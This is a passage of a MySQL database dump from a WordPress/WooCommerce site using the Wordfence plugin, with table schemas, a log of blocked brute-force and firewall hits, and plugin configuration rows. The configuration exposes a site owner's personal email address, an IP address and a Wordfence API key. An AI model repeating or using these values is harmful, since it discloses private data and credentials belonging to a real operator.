--
LOCK TABLES `wp_wc_order_tax_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_product_attributes_lookup`
--
DROP TABLE IF EXISTS `wp_wc_product_attributes_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_product_attributes_lookup` (
`product_id` bigint(20) NOT NULL,
`product_or_parent_id` bigint(20) NOT NULL,
`taxonomy` varchar(32) NOT NULL,
`term_id` bigint(20) NOT NULL,
`is_variation_attribute` tinyint(1) NOT NULL,
`in_stock` tinyint(1) NOT NULL,
PRIMARY KEY (`product_or_parent_id`,`term_id`,`product_id`,`taxonomy`),
KEY `is_variation_attribute_term_id` (`is_variation_attribute`,`term_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_product_attributes_lookup`
--
LOCK TABLES `wp_wc_product_attributes_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_attributes_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_product_attributes_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_product_download_directories`
--
DROP TABLE IF EXISTS `wp_wc_product_download_directories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_product_download_directories` (
`url_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`url` varchar(256) NOT NULL,
`enabled` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`url_id`),
KEY `url` (`url`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_product_download_directories`
--
LOCK TABLES `wp_wc_product_download_directories` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_download_directories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_product_download_directories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_product_meta_lookup`
--
DROP TABLE IF EXISTS `wp_wc_product_meta_lookup`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_product_meta_lookup` (
`product_id` bigint(20) NOT NULL,
`sku` varchar(100) DEFAULT '',
`virtual` tinyint(1) DEFAULT 0,
`downloadable` tinyint(1) DEFAULT 0,
`min_price` decimal(19,4) DEFAULT NULL,
`max_price` decimal(19,4) DEFAULT NULL,
`onsale` tinyint(1) DEFAULT 0,
`stock_quantity` double DEFAULT NULL,
`stock_status` varchar(100) DEFAULT 'instock',
`rating_count` bigint(20) DEFAULT 0,
`average_rating` decimal(3,2) DEFAULT 0.00,
`total_sales` bigint(20) DEFAULT 0,
`tax_status` varchar(100) DEFAULT 'taxable',
`tax_class` varchar(100) DEFAULT '',
PRIMARY KEY (`product_id`),
KEY `virtual` (`virtual`),
KEY `downloadable` (`downloadable`),
KEY `stock_status` (`stock_status`),
KEY `stock_quantity` (`stock_quantity`),
KEY `onsale` (`onsale`),
KEY `min_max_price` (`min_price`,`max_price`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_product_meta_lookup`
--
LOCK TABLES `wp_wc_product_meta_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_product_meta_lookup` VALUES
(323,'',0,0,1000.0000,1000.0000,0,NULL,'instock',0,0.00,0,'taxable','');
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_rate_limits`
--
DROP TABLE IF EXISTS `wp_wc_rate_limits`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_rate_limits` (
`rate_limit_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`rate_limit_key` varchar(200) NOT NULL,
`rate_limit_expiry` bigint(20) unsigned NOT NULL,
`rate_limit_remaining` smallint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`rate_limit_id`),
UNIQUE KEY `rate_limit_key` (`rate_limit_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_rate_limits`
--
LOCK TABLES `wp_wc_rate_limits` WRITE;
/*!40000 ALTER TABLE `wp_wc_rate_limits` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_rate_limits` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_reserved_stock`
--
DROP TABLE IF EXISTS `wp_wc_reserved_stock`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_reserved_stock` (
`order_id` bigint(20) NOT NULL,
`product_id` bigint(20) NOT NULL,
`stock_quantity` double NOT NULL DEFAULT 0,
`timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`expires` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`order_id`,`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_reserved_stock`
--
LOCK TABLES `wp_wc_reserved_stock` WRITE;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_tax_rate_classes`
--
DROP TABLE IF EXISTS `wp_wc_tax_rate_classes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_tax_rate_classes` (
`tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
PRIMARY KEY (`tax_rate_class_id`),
UNIQUE KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_tax_rate_classes`
--
LOCK TABLES `wp_wc_tax_rate_classes` WRITE;
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` DISABLE KEYS */;
INSERT INTO `wp_wc_tax_rate_classes` VALUES
(1,'Reduced rate','reduced-rate'),
(2,'Zero rate','zero-rate');
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_webhooks`
--
DROP TABLE IF EXISTS `wp_wc_webhooks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_webhooks` (
`webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`status` varchar(200) NOT NULL,
`name` text NOT NULL,
`user_id` bigint(20) unsigned NOT NULL,
`delivery_url` text NOT NULL,
`secret` text NOT NULL,
`topic` varchar(200) NOT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`api_version` smallint(4) NOT NULL,
`failure_count` smallint(10) NOT NULL DEFAULT 0,
`pending_delivery` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`webhook_id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_webhooks`
--
LOCK TABLES `wp_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `wp_wc_webhooks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblockediplog`
--
DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfblockediplog` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`countryCode` varchar(2) NOT NULL,
`blockCount` int(10) unsigned NOT NULL DEFAULT 0,
`unixday` int(10) unsigned NOT NULL,
`blockType` varchar(50) NOT NULL DEFAULT 'generic',
PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblockediplog`
--
LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES
('\0\0\0\0\0\0\0\0\0\0��@�','DE',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��]<�','US',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��,i\\','DE',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0���=.','US',8,19917,'waf'),
('\0\0\0\0\0\0\0\0\0\0�����','DE',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0���\Z^','FR',1,19918,'waf'),
('\0\0\0\0\0\0\0\0\0\0��̎;','US',1,19929,'brute'),
('\0\0\0\0\0\0\0\0\0\0��̎;','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��̎;','US',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��̎;','US',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��3x','US',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��b�\\','US',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��#S��','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��#�w�','FR',1,19919,'waf'),
('\0\0\0\0\0\0\0\0\0\0��#��&','CA',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0��#��&','CA',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��+��','DE',1,19924,'waf'),
('\0\0\0\0\0\0\0\0\0\0��-`\n','TR',2,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��-`\n','TR',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��-U��','TR',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0��-U��','TR',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��.�.','TR',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��.�(j','NL',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��.�(j','NL',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��2>�7','US',1,19920,'brute'),
('\0\0\0\0\0\0\0\0\0\0��3�C','FR',3,19917,'waf'),
('\0\0\0\0\0\0\0\0\0\0��3�C','FR',8,19920,'waf'),
('\0\0\0\0\0\0\0\0\0\0��3�C','FR',1,19928,'waf'),
('\0\0\0\0\0\0\0\0\0\0��3D#�','GB',1,19926,'brute'),
('\0\0\0\0\0\0\0\0\0\0��3�|H','FR',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��3�q�','FR',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0��6&Uh','FR',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0��6&Uh','FR',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0��6�a','IE',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0��>��','NL',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0��?���','US',1,19929,'brute'),
('\0\0\0\0\0\0\0\0\0\0��@Ǡ','RO',1,19923,'waf'),
('\0\0\0\0\0\0\0\0\0\0��@�d�','DE',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��A&y','RO',1,19924,'waf'),
('\0\0\0\0\0\0\0\0\0\0��A<==','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��AlJ�','FI',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��AlJ�','FI',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��C��','US',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��E��','US',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��H*S','RO',1,19923,'waf'),
('\0\0\0\0\0\0\0\0\0\0��J�','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��JР_','US',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0��Kw�*','DE',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��M�b','NL',1,19931,'waf'),
('\0\0\0\0\0\0\0\0\0\0��R�Ef','ES',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0��V0�','SE',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0��XƄD','DE',1,19926,'brute'),
('\0\0\0\0\0\0\0\0\0\0��X�ĉ','GB',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��X��','GB',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0��Y�lV','DE',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��Z��@','RU',1,19926,'brute'),
('\0\0\0\0\0\0\0\0\0\0��[\\�@','BG',16,19919,'waf'),
('\0\0\0\0\0\0\0\0\0\0��[���','RU',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0��[�.�','DE',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0��[�.�','DE',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��[��','IL',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0��\\�9�','FR',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0��]_؛','IT',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0��^�@K','BG',156,19931,'waf'),
('\0\0\0\0\0\0\0\0\0\0��^�E�','BG',1,19920,'waf'),
('\0\0\0\0\0\0\0\0\0\0��^�E�','BG',8,19922,'waf'),
('\0\0\0\0\0\0\0\0\0\0��^���','IT',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��_�V','FI',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0��g��','MY',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0��h���','NL',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0��mͶ�','DE',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0����\Z�','GB',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0���;q�','SG',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����r','DE',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���]_�','US',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����5','SG',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0���[cJ','DE',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���P�','FR',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0���uNs','US',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����B','FR',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����B','FR',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0����','DE',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0����8�','US',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����0','SG',1,19929,'brute'),
('\0\0\0\0\0\0\0\0\0\0����g�','US',1,19920,'brute'),
('\0\0\0\0\0\0\0\0\0\0���߾g','US',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0���#=�','US',1,19920,'brute'),
('\0\0\0\0\0\0\0\0\0\0���a��','DE',2,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0����d','FR',1,19926,'brute'),
('\0\0\0\0\0\0\0\0\0\0���Zݖ','DE',10,19929,'waf'),
('\0\0\0\0\0\0\0\0\0\0�����}','FR',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0����cp','US',1,19920,'brute'),
('\0\0\0\0\0\0\0\0\0\0����~�','DE',1,19929,'brute'),
('\0\0\0\0\0\0\0\0\0\0������','US',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0���>*o','US',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0���h�K','DE',1,19926,'brute'),
('\0\0\0\0\0\0\0\0\0\0����� ','DE',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0����� ','DE',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����A','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0���i�','FR',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0���c ','RU',2,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0����t','DE',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0���?','DE',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0����J�','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����&','NL',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����&','NL',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0���π','IT',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���-T','GB',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���JQ','ES',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���NAH','IT',1,19941,'brute'),
('\0\0\0\0\0\0\0\0\0\0���h�&','ES',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0����2','KZ',1,19939,'brute'),
('\0\0\0\0\0\0\0\0\0\0����2','KZ',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0����^','RU',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0���','DE',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����E','ES',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����','HU',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0���F`�','FR',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19918,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19920,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19922,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19924,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19926,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19929,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&\r','UA',1,19930,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19917,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19918,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19920,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19921,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19924,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19925,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19927,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19928,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&','UA',1,19930,'waf'),
('\0\0\0\0\0\0\0\0\0\0���&�v','KG',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0���ɨ','DE',1,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0���ɨ','DE',1,19943,'brute'),
('\0\0\0\0\0\0\0\0\0\0���:v','US',1,19940,'brute'),
('\0\0\0\0\0\0\0\0\0\0���+-�','TH',1,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0���=�:','DE',1,19945,'brute'),
('\0\0\0\0\0\0\0\0\0\0���=��','DE',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0���,�^','US',1,19946,'brute'),
('\0\0\0\0\0\0\0\0\0\0��ν�','GB',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���a��','SG',2,19942,'brute'),
('\0\0\0\0\0\0\0\0\0\0���a��','SG',1,19944,'brute'),
('\0\0\0\0\0\0\0\0\0\0���7�/','CH',1,19927,'brute'),
('\0\0\0\0\0\0\0\0\0\0���a��','DK',2,19928,'brute'),
('\0\0\0\0\0\0\0\0\0\0�����\"','DE',2,19930,'waf'),
('\0\0\0\0\0\0\0\0\0\0���Lh)','DE',1,19928,'brute');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblocks7`
--
DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfblocks7` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` int(10) unsigned NOT NULL DEFAULT 0,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`blockedTime` bigint(20) NOT NULL,
`reason` varchar(255) NOT NULL,
`lastAttempt` int(10) unsigned DEFAULT 0,
`blockedHits` int(10) unsigned DEFAULT 0,
`expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
`parameters` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `type` (`type`),
KEY `IP` (`IP`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=1882 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblocks7`
--
LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfconfig`
--
DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wfconfig` (
`name` varchar(100) NOT NULL,
`val` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfconfig`
--
LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES
('activatingIP','178.252.180.169','yes'),
('actUpdateInterval','2','yes'),
('addCacheComment','0','yes'),
('adminNoticeQueue','a:0:{}','yes'),
('adminUserList','a:2:{i:1;i:1;i:2;i:1;}','yes'),
('advancedCommentScanning','1','yes'),
('ajaxWatcherDisabled_admin','0','yes'),
('ajaxWatcherDisabled_front','0','yes'),
('alertEmails','masoud.nikoofar@gmail.com','yes'),
('alertOn_adminLogin','1','yes'),
('alertOn_block','1','yes'),
('alertOn_breachLogin','1','yes'),
('alertOn_firstAdminLoginOnly','0','yes'),
('alertOn_firstNonAdminLoginOnly','0','yes'),
('alertOn_loginLockout','1','yes'),
('alertOn_lostPasswdForm','1','yes'),
('alertOn_nonAdminLogin','0','yes'),
('alertOn_scanIssues','1','yes'),
('alertOn_severityLevel','25','yes'),
('alertOn_throttle','0','yes'),
('alertOn_update','0','yes'),
('alertOn_wafDeactivated','1','yes'),
('alertOn_wordfenceDeactivated','1','yes'),
('alert_maxHourly','0','yes'),
('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),
('allowed404s6116Migration','1','yes'),
('allowHTTPSCaching','0','yes'),
('allowLegacy2FA','0','yes'),
('allowMySQLi','1','yes'),
('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1723780200;s:4:\"args\";a:1:{i:0;i:1723780200;}}i:1;a:2:{s:9:\"timestamp\";i:1724039400;s:4:\"args\";a:1:{i:0;i:1724039400;}}}','yes'),
('apiDelayedUntil','1715766284','yes'),
('apiKey','d628f917f94042316daebf1e823b21451ab0a7764c75c24dfbe70dd973bb4494b0237983ab4c3720a0827b8cddc9665f5b11f7427265c780ef0dfa850d3cc8e2','yes'),
('autoBlockScanners','1','yes'),
('autoUpdate','1','yes'),
('autoUpdateAttempts','0','yes'),
('autoUpdateChoice','1','yes'),
('bannedURLs','','yes'),
('blockCustomText','','yes'),
('blockedTime','300','yes'),
('blocks702Migration','1','yes'),
('cacheType','disabled','yes'),
('cbl_action','block','yes'),
('cbl_bypassRedirDest','','yes'),
('cbl_bypassRedirURL','','yes'),
('cbl_bypassViewURL','','yes'),
('cbl_cookieVal','64e90f3d11ea6','yes'),
('cbl_loggedInBlocked','','yes'),
('cbl_redirURL','','yes'),
('cbl_restOfSiteBlocked','1','yes'),
('checkSpamIP','1','yes'),
('config701Migration','1','yes'),
('config720Migration','1','yes'),
('configWritingTest','a096f4fdbbef970e4cbff76f75e2a06f','no'),
('configWritingTest_ser','a:1:{i:0;s:32:\"a096f4fdbbef970e4cbff76f75e2a06f\";}','no'),
('coreHashes','�\0\0\0\0\0\0\0��a:2:{s:4:\"hash\";s:64:\"266f54c31ed64713aa695e76a9041b0edd0e3ee756aa2b27c2b098e85d752f2e\";s:6:\"hashes\";s:144640:\"\0���W7���ht#� ��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q���\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6�� �j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$� �4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��y�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��5 ��}�x(��r�:a,zmK�H1|/��+��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{������5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n��^��� nt�\"V8�M@�H؟Q��[S$����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u re4�+JuP$,�WN��P�2�\"Ş�,|^��y���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_� �Q�������oS�nn�̵v�\0)�����S��nR�\'��X�^���kh����ɑ�i�7����Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W: 